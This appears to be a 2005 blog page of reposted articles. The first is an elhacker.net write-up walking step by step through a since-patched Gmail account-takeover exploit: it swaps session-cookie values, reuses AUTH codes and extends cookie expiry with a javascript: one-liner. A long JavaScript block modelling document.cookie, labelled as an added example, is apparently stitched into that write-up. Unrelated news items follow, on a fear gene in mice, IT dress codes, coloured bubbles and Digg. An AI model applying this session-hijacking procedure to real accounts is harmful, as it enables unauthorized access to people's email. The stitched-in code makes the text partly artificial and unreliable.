Friday, November 18, 2005

GMail Exploit

INTRODUCTION

This bug has already been fixed; that is why it is being published now.

This write-up shows, step by step, how to exploit a Gmail vulnerability that gave access to any account. It was reported by Anelkaos, a collaborator on elhacker.net's forum, and patched by Google on October 18. Because of the bug's severity (a few simple steps were enough to log in to any Gmail account), it was decided not to publish this document while the bug was still live. The reasons are more than obvious: ALL Gmail accounts were vulnerable to it.

Google has not made any definitive statement on the matter, and they do not seem to intend to publish the bug. The bug was demonstrated to the editors of the magazine "Seguridad0" by logging into an account created for that purpose, as described in http://www.elistas.net/lista/informativos/archivo/indice/61/msg/79/. CyruxNET and PCWorld also "dared" to publish the news.

The bug was discovered on October 14 and patched on October 18, because ANELKAOS decided to contact Gmail instead of publishing the bug on a security mailing list. Unfortunately we could not give more demonstrations to the other sites we sent the news to, and because we are not HBX Networks, everyone demanded a "hacking test". Thank heavens we have kept all the mails in which Google acknowledges the bug. ;)

Unlike the bug reported by HBX and published by BetaNews last year, this one does not require stealing a cookie, which made it considerably more dangerous.

PROCEDURE

This is the way Sirdarckcat (an EHN user) developed the exploit; the original method is simpler, but the concept is the same.

Because this demonstration was carried out against another person's account, all data that could have legal consequences has been hidden. The AUTH variable carries the encrypted address of the mailbox owner, and although we do not know how to decrypt it, we preferred to hide its values in case "someone else" can :).

First of all, we need two sessions. For that we chose to use Internet Explorer and Mozilla. We log in normally, for example in Mozilla.

If we pay attention, we notice that the login screen is now different. It no longer just asks whether you have forgotten your password; it now also asks for the username. Quite a coincidence, isn't it? Changing the authentication so soon, right when the bug's existence was published, is too much of a coincidence. We're talking about 10 days :).

Well, let's continue. Now we need some data that we will modify. For that we also start an Internet Explorer session, but we stop the browser as soon as it says "Loading...".

We simply view the page source and save the value of the "ver" variable, which we will need later.

Then we let the page finish loading and look at the inbox URL, which we can see by right-clicking and choosing Properties.

We will need the "zx" variable, so we save it.

Now we go to 'mail/?username=victim&zx=[zx Variable]'

And we stop the page loading just as it finishes "Loading...", getting inside:

We stop the browser again and look at the page source.

Here we have the AUTH code we need to log in as our victim, but our cookie does not match.

We look at what we have in the cookie and replace the value of "ID" with the "ver" value we saved earlier. Surprisingly, this is accepted as a valid value! It carries no related information, so why does that happen? Who knows...

Gmail confirms that it is correctly encrypted and satisfies all its rules. Even though the content is unrelated, it does not return an error.

Once the cookie has been modified, in the Explorer session we go to the following page:

http://mail.google.com/mail?gxlu=victim&zx=[zx Variable]

At this point we have not yet started a session; we have only been associated with the victim's account.

So we go to: www.google.com/accounts/ServiceLoginAuth.

And it sends you to:

mail.google.com/mail/?auth=[AUTH code]

At this point all we have to do is modify the expiry of the cookie, which is about to expire... We give it at least 1 minute of life.

We enter mail.google.com/mail/?&&rm=false&null=Entrar&continue

We stop the page loading, because otherwise Google will close our session, and then we type:

javascript:document.cookie+=";expires=Thu,%2001%20Jan%202070%2000:00:00%20GMT";

Once the cookie's lifetime has been extended, we go to http://mail.google.com/mail/?auth=[AUTH Code]

And we are logged in as the victim.

Complete access, of course :).
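As an added example (not code from the elhacker.net write-up), the following JavaScript models the document.cookie getter and setter according to RFC 6265 section 5.2 and runs the expiry-extension one-liner from the procedure above (with its %20 sequences decoded to spaces, as the address bar does) against a jar of constructed session cookies. It shows the caveat a practitioner would want to know: the assignment re-sets only the first cookie in the serialised string with the new Expires attribute, while the second name=value pair is parsed as an unknown attribute and ignored, so any other session cookie keeps its original lifetime. The cookie named "S" and all cookie values are constructed assumptions for the example; "ID" is the name used in the write-up.

```javascript
// Added example, not the write-up's own code: a minimal model of the
// document.cookie getter/setter following RFC 6265 section 5.2 (simplified),
// used to show what
//   javascript:document.cookie+=";expires=Thu, 01 Jan 2070 00:00:00 GMT"
// does to a jar that holds more than one session cookie.
// Cookie names other than "ID" and all values are constructed for the example.

class CookieJar {
  constructor() {
    this.store = new Map(); // name -> { value, expires }
  }

  // Getter: the serialised "name=value; name2=value2" string a page sees.
  get cookie() {
    return [...this.store.entries()]
      .map(([name, c]) => `${name}=${c.value}`)
      .join("; ");
  }

  // Setter: parses ONE set-cookie-string. Only the first name=value pair is
  // the cookie; everything after the first ';' is an attribute, and attribute
  // names the parser does not know are silently ignored (RFC 6265 5.2).
  set cookie(str) {
    const parts = str.split(";");
    const eq = parts[0].indexOf("=");
    if (eq < 0) return;                      // no "=" in name-value-pair: ignore
    const name = parts[0].slice(0, eq).trim();
    const value = parts[0].slice(eq + 1).trim();
    if (name === "") return;                 // empty name: ignore
    let expires = null;
    for (const attr of parts.slice(1)) {
      const aeq = attr.indexOf("=");
      const aname = (aeq < 0 ? attr : attr.slice(0, aeq)).trim().toLowerCase();
      const aval = aeq < 0 ? "" : attr.slice(aeq + 1).trim();
      if (aname === "expires") {
        const t = Date.parse(aval);          // Node parses the RFC 1123 date form
        if (!Number.isNaN(t)) expires = new Date(t);
      }
      // max-age, path, domain, secure and httponly would be handled here; any
      // other name, including a second "name=value" pair, is dropped.
    }
    this.store.set(name, { value, expires });
  }
}

// A jar like the one in the procedure: the modified "ID" session cookie plus a
// second session cookie (constructed). Neither has an Expires attribute yet.
function buildJar() {
  const jar = new CookieJar();
  jar.cookie = "ID=MODIFIED-ver-VALUE";        // constructed value
  jar.cookie = "S=some-other-session-token";   // constructed name and value
  return jar;
}

// Apply the one-liner from the write-up and report what actually changed.
function extendFirstCookie(jar) {
  jar.cookie += ";expires=Thu, 01 Jan 2070 00:00:00 GMT";
  return {
    idExpires: jar.store.get("ID").expires,  // Date in 2070: extended
    sExpires: jar.store.get("S").expires,    // still null: untouched
    serialized: jar.cookie,                  // values unchanged
  };
}

console.log(extendFirstCookie(buildJar()));
```

The model is why the step in the write-up only needs the one cookie to survive: the whole serialised cookie string is fed back into the setter, which keeps the first pair as the cookie and treats the rest as attributes. If the session cookie that matters were not first in document.cookie, the same one-liner would extend the wrong one.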

CLOSING REMARKS

OK, it is a beta, and they are not obliged to report anything. But if they had acknowledged it and published a thank-you note, this information would not have been published. We have 3 ways of reaching the same result, the other 2 being considerably easier, from which we can easily deduce that this is a multi-bug and a design error. With all these clues, it will not take long for others to discover new methods.

source:http://www.elhacker.net/gmailbug/english_version.htm


Gene turn-off makes meek mice fearless

Deactivating a specific gene transforms meek mice into daredevils, researchers have found. The team believe the research might one day enable people suffering from fear – in the form of phobias or anxiety disorders, for example – to be clinically treated.

The research found that mice lacking an active gene for the protein stathmin are not only more courageous, but are also slower to learn fear responses to pain-associated stimuli, says geneticist Gleb Shumyatsky, at Rutgers University in New Jersey, US.

In the experiments, the stathmin-lacking mice wandered out into the centre of an open box, in defiance of the normal mouse instinct to hide along the box’s walls to avoid potential predators.

And to test learned fear, the mice were exposed to a loud sound followed by a brief electric shock from the floor below them. A day later, normal mice froze when the sound was played again. Stathmin-lacking mice barely reacted to the sound at all.

Neural responses

In both mice and humans, the amygdala area of the brain serves as the control centre of basic fear impulses. Stathmin is found almost exclusively in this and related brain areas.

The protein is known to destabilise microtubule structures that help maintain the connections between neurons. This allows the neurons to make new connections, allowing the animal to learn and process fear experiences, Shumyatsky says. Without it, the neural responses are stilted.

The lack of the protein does not appear to affect other learning experiences, as both sets of mice were able to memorise the paths out of mazes equally well. “This is a good sign for an eventual clinical application that could let people deal with their fears in an entirely different way,” Shumyatsky says.

In 2002, Shumyatsky and colleagues published a study on a similar gene encoding for a protein called GRP. But this protein seems only to be associated with learned fear, and would therefore only have clinical implications for conditions such as post-traumatic stress disorder.

Stathmin, on the other hand, seems to affect both learned and innate fear, which could lead to treatments for a much broader range of phobias and anxiety disorders, Shumyatsky says.

Journal reference: Cell (DOI: 10.1016/j.cell.2005.08.038)


IT workers dubbed 'worst dressed'

More than 150 tech professionals attended a corporate fashion show in Sydney as organisers officially dubbed the industry "the worst dressed" in Australia.

Short sleeved shirts, man-made fibres and the wrong coloured socks were some of the most common fashion faux-pas cited by corporate stylist, Melanie Moss, who hosted the event on Wednesday night.

"Because the majority of IT people are not in front of customers all the time, they tend to slack off," she said.

Help-desk staff were named as the worst offenders, followed by those working in technology start-ups, many of whom had continued to wear T-shirts to work as a consequence of the casual web culture of the '90s.

"The internet is now such a massive industry but people haven't caught up in terms of their dress," she said.

Trudy David, a training manager for Apple Computer, conceded her industry had some image problems when it came to style but felt the event had helped to give attendees a "mindshare" that it was important to present oneself well.

"I think the way in which you present yourself is very important to building relationships and is integral to business and personal success," she said.

The Corporate Chic show was devised by computer training company, Cliftons. Managing director Andrew Cameron said: "It seems Sydney is ready to consider corporate styling, and we hope to take the concept to the rest of Australia".

Ms Moss believes money should be no object when it comes to dressing well.

"This is not only about wearing suits, just a good quality shirt with a nice print and smart slacks is often enough as long as everything co-ordinates."

She added that wearing natural fibres was also important. "Polyester doesn't wear well, and gets sweaty and smelly," she said.

Her top tip for those seeking a fresh look is to photograph a variety of nice combinations from your wardrobe to use as a reference when dressing in the morning.

She also recommends looking through magazines to get a feel for what suits you. "This is about thinking about what suits you instead of following trends," she said.

And if you must wear jeans and thongs in to work, feet must be in a good condition. "That means no yellow toe nails," she said.

Ms Moss said retail ranked as the second most unfashionable profession with some of the salesmen in the industry displaying "quite shocking" dress sense.

source:http://www.smh.com.au/articles/2005/11/17/1132016909640.html?oneclick=true


The 11-Year Quest to Create Disappearing Colored Bubbles

"Popular Science has a fascinating article up about toy inventor Tim Kehoe's quest to create colored bubbles. 'Chemical burns, ruined clothes, 11 years, half a million dollars--it's not easy to improve the world's most popular toy. ... It turns out that coloring a bubble is an exceptionally difficult bit of chemistry.'"

source:http://science.slashdot.org/article.pl?sid=05/11/17/2250259&tid=159&tid=14

Digg Just Might Bury Slashdot

Story location: http://www.wired.com/news/technology/0,1282,69568,00.html

02:00 AM Nov. 17, 2005 PT

A hot new social-bookmarking site is deluging web servers all over the net with a tsunami of traffic -- and is starting to make Slashdot-size waves.

Digg, a San Francisco news site compiled by its own readers, lists links to interesting new technology articles. A mention on the front page can cripple a server for days, in a pattern that mirrors the famed Slashdot effect.

Although the two sites employ different publishing techniques -- editors maintain 7-year-old tech granddaddy Slashdot, while Digg runs stories proposed and voted on by members -- many are calling the upstart a "Slashdot killer."

The comparisons are clear -- while the official term for adding a link to Digg is "digging," popular sites that receive a huge wave of traffic get a "Diggdotting," a nod to "Slashdotting."

Digg's status as the new Slashdot is further enhanced by digg vs dot, a comparison project that finds diggers are usually first to the punch, though users of each site often submit identical stories.

Celebrating its first birthday this month, Digg's traffic is fast catching up with Slashdot's. Its 80,000-user base is doubling every three months, and the surprised owners of linked-to websites are feeling the results of its popularity.

"My site was virtually unknown to anyone besides friends, but when my story made it to the front page of Digg, my stats skyrocketed," said Jesse Crouch of Springfield, Illinois, whose blog leapt from 400 daily visitors to more than 7,000 when his tutorial on small-budget photography was picked up by Digg last week.

"When (the CPU) hit 100 percent for a few moments, I was worried," Crouch said. "My server had never experienced anything like this before, and when your site finally gets some exposure, it's the worst possible time for it to go down."

The effect is felt far and wide. Digg gets up to 1,000 links submitted every day and 500,000 visitors, radiating traffic around the web. Its growth has been so pronounced that the site's own server melted down earlier this month.

But extra infrastructure and new staff will be added, thanks to a $2.8 million investment from a high-profile consortium of investors, including Netscape co-founder Marc Andreessen.

"Digg is quite different from (older) sites," said founder Kevin Rose. "Slashdot is put together by an editorial board. Digg uses the collective wisdom of the masses and, consequently, news breaks faster."

Such growth, and the absence of formal editors, has prompted concerns that unscrupulous marketers could tap Digg to bring lucrative traffic to attention-seeking clients.

But David Kirk, a designer whose tech-recipes site is routinely pounded by Digg links, cautions webmasters against expecting dollar signs.

"People try to game Digg every day, but we only see minor bumps in our advertising income on the days that we have experienced the Digg effect," he said. "Digg users visit, look around and move on (without clicking ads). For many sites, that increase in income would not even cover the increased cost of bandwidth used."

Critics also say Digg is more chaotic than Slashdot, which often features more technical, detailed conversations. But Digg, with its tight weblog integration and Flickr-like reliance on the collective efforts of its members, is pointing the way to a new wave of socially assembled news initiatives, organized and made sense of by readers themselves.

Sites like del.icio.us or the soon-to-be-unveiled Newsvine, which will let readers bookmark, share and reply to online stories from a range of news organizations, are examples of that wave.

"We plan to expand into a variety of other areas including science and political news, developing new areas that will be similar to sections of a newspaper," said Rose. "People like Digg because it's fast, convenient and relevant. They feel like they are contributing and driving honesty in media as a result of digging."

source:http://www.wired.com/news/print/0,1294,69568,00.html


This page is powered by Blogger. Isn't yours?